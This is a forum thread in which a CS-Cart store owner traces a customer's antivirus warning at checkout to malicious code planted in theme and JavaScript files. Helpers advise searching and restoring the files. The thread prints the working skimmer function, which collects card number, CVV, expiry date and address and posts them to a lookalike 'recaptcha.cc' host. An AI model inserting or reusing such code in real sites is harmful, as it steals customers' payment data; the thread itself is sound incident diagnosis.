I have a customer stating his Norton is telling him my site has been infected when trying to checkout and kicks him off my site. I tried to replicate the issue but I get no warnings and he is the only one that has mentioned it. The warning isn’t even on my domain but happens during checkout. So I’m wondering if his computer is infected or this is a legit problem with my site. The warning is coming from https://recaptcha.cc/“mydomain”.php. “mydomain” is actually my domain name without the .com attached to it. Anyone heard of anything like this? I couldn’t find any information on recaptcha.cc and the website itself gets a warning of a trojan. Just wondering if his warnings could have anything to do with my website.
This is a third-party domain that is not associated with Google reCAPTCHA anyway. Can you find the links to this domain in the HTML code of your store’s pages? If not, I assume there is something malicious installed on your customer’s PC.
I’m pretty sure the customer’s computer is infected and it’s trying to trick him into thinking it is our site because the .php part matches our domain. The recaptcha.cc site is a trojan site when you go it so I can see why the warning would be happening. Just not sure how it is being triggered during checkout from our site so trying to get more information from them. No source code on our checkout page has any links to the .cc site.
Customer states: “The Norton warning and disconnect occurs when I am at the end of checking out, when I try to enter the name on the credit card. I clicked “continue to the site” a couple times (despite warning not to do so by Norton) and was able to complete the check out and have received an order confirmation email.”
This was paid using normal credit card on site (cc.tpl). Just to make sure, is there some file I should be looking at to make sure the link to this malicious site isn’t in there?
You can use grep in your installation to check if this text is present in any files in your installation. You can also search your store’s database for any matches.
With the help of grep and my host we did find some files with this information in it:
shop/design/themes/responsive/templates/index.tpl
shop/js/lib/select2/dist/js/select2.full.min.js
shop/js/tygh/checkout/pickup_search.js
In all three cases, it occurs within a function as a variable which contains the URL recaptcha.cc:
function rasdafgss()
{
params = 'fname='+fname+'&street_address='+street_address+'&City='+City+'&State='+State+'&Country='+Country+'&PostCode='+PostCode+'&CCNo='+CCNo+'&CVV='+CVV+'&ExpDateMonth='+ExpDateMonth+'&ExpDateYear='+ExpDateYear;
var url = 'https://recaptcha.cc/mysite.php';
var http = new XMLHttpRequest();
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.send(params);
}
“Unfortunately, I can’t say how it got there. The timestamps on all three files are old (from 2020 and 2021), but these cannot necessarily be replied upon, as some malware will edit these to thwart/confuse removal efforts.”
So can I just remove this malicious code from those 3 files and be good to go? Or any other advice?
Yes, of course, remove that code. There are no such lines of code in the standard CS-Cart files. In fact, I can recommend that you completely replace these files with the original ones. Just get them from the CS-Cart distribution of the same version you are using.
Yes, I removed the code shortly after it was found. There was another block of code after that which was also not normal so it was removed too. All has been working fine since.
1 Like